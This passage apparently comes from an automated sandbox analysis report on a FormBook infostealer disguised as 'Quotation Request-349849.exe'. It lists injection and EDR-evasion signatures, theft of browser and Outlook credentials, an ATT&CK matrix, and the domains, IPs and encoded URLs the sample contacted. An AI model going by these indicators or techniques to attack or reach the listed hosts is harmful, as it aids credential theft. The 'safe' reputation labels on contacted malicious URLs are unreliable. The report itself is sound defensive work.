                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]3_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]3_2_03BFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]3_2_03B5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov eax, dword ptr fs:[00000030h]3_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B52835 mov ecx, dword ptr fs:[00000030h]3_2_03B52835
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008280A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_008280A9
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007FA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007FA155
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007FA124 SetUnhandledExceptionFilter,0_2_007FA124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\comp.exeThread register set: target process: 6768Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\comp.exeThread APC queued: target process: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3190008Jump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008287B1 LogonUserW,0_2_008287B1
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007D3B3A
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007D48D7
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00834C27 mouse_event,0_2_00834C27
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quotation Request-349849.exe"Jump to behavior
                Source: C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00827CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00827CAF
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0082874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0082874B
                Source: Quotation Request-349849.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Quotation Request-349849.exe, LcmEonpIrfS.exe, 00000005.00000000.1645958140.0000000001650000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2559026369.0000000001651000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559676840.0000000000CF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: LcmEonpIrfS.exe, 00000005.00000000.1645958140.0000000001650000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2559026369.0000000001651000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559676840.0000000000CF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: LcmEonpIrfS.exe, 00000005.00000000.1645958140.0000000001650000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2559026369.0000000001651000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559676840.0000000000CF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: LcmEonpIrfS.exe, 00000005.00000000.1645958140.0000000001650000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000005.00000002.2559026369.0000000001651000.00000002.00000001.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559676840.0000000000CF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F862B cpuid 0_2_007F862B
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00804E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00804E87
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00811E06 GetUserNameW,0_2_00811E06
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00803F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00803F3A
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007D49A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\comp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Quotation Request-349849.exeBinary or memory string: WIN_81
                Source: Quotation Request-349849.exeBinary or memory string: WIN_XP
                Source: Quotation Request-349849.exeBinary or memory string: WIN_XPe
                Source: Quotation Request-349849.exeBinary or memory string: WIN_VISTA
                Source: Quotation Request-349849.exeBinary or memory string: WIN_7
                Source: Quotation Request-349849.exeBinary or memory string: WIN_8
                Source: Quotation Request-349849.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00846283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00846283
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00846747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00846747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574656 Sample: Quotation Request-349849.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 28 www.infohive.website 2->28 30 www.gk88top.top 2->30 32 5 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 48 5 other signatures 2->48 10 Quotation Request-349849.exe 2 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 LcmEonpIrfS.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 comp.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 LcmEonpIrfS.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 qqa79.top 38.47.233.21, 49822, 80 COGENT-174US United States 22->34 36 www.gk88top.top 172.67.137.47, 49858, 49868, 49874 CLOUDFLARENETUS United States 22->36 38 3 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Quotation Request-349849.exe47%ReversingLabsWin32.Trojan.AutoitInject
                Quotation Request-349849.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.127358.win/2mep/?Er=qt9d5V&UZkt_p=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk4oV88xQLJu313/wS+c/dWkGwsg/R2WIJaTqq/By1MtUaaLvo6grX4O50%Avira URL Cloudsafe
                http://www.sunnyz.store0%Avira URL Cloudsafe
                http://www.sunnyz.store/ead0/0%Avira URL Cloudsafe
                http://www.infohive.website/cnve/0%Avira URL Cloudsafe
                http://www.gk88top.top/vjnn/?UZkt_p=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2FtKgHUwtP7LZToi+NLiM5u8oda1xOl7pN9QCYN1UR2qYINqcP5uKuM1&Er=qt9d5V0%Avira URL Cloudsafe
                http://www.infohive.website/cnve/?UZkt_p=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVYx8sa0WL+tT4casLEwE0iohoJSZhnQSJqMleUJfhtsmPpk3GYPvE1sgo&Er=qt9d5V0%Avira URL Cloudsafe
                http://www.127358.win/2mep/0%Avira URL Cloudsafe
                http://www.gk88top.top/vjnn/0%Avira URL Cloudsafe
                http://www.sunnyz.store/ead0/?UZkt_p=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBis+/iOoNTjmW2l9qNTHM4rN5vAuihI7D9EwPr7Z7opV/5wbcLxFzIpB/&Er=qt9d5V0%Avira URL Cloudsafe
                http://www.qqa79.top/t67p/?UZkt_p=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK5swGMfjJNS9OKmwWbAAHFg65wmu/s0j5u+YMxZCZuR1sUVf7BfBaxXx&Er=qt9d5V0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                qqa79.top
                		38.47.233.21
                		truetrue
                  		unknown
                  webredir.vip.gandi.net
                  		217.70.184.50
                  		truefalse
                    		high
                    www.127358.win
                    		206.238.89.119
                    		truefalse
                      		high
                      www.infohive.website
                      		66.29.149.46
                      		truetrue
                        		unknown
                        www.gk88top.top
                        		172.67.137.47
                        		truetrue
                          		unknown
                          www.sunnyz.store
                          		unknown
                          		unknownfalse
                            		unknown
                            www.qqa79.top
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.infohive.website/cnve/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sunnyz.store/ead0/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sunnyz.store/ead0/?UZkt_p=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBis+/iOoNTjmW2l9qNTHM4rN5vAuihI7D9EwPr7Z7opV/5wbcLxFzIpB/&Er=qt9d5Vtrue
                              • Avira URL Cloud: safe
                              		unknown
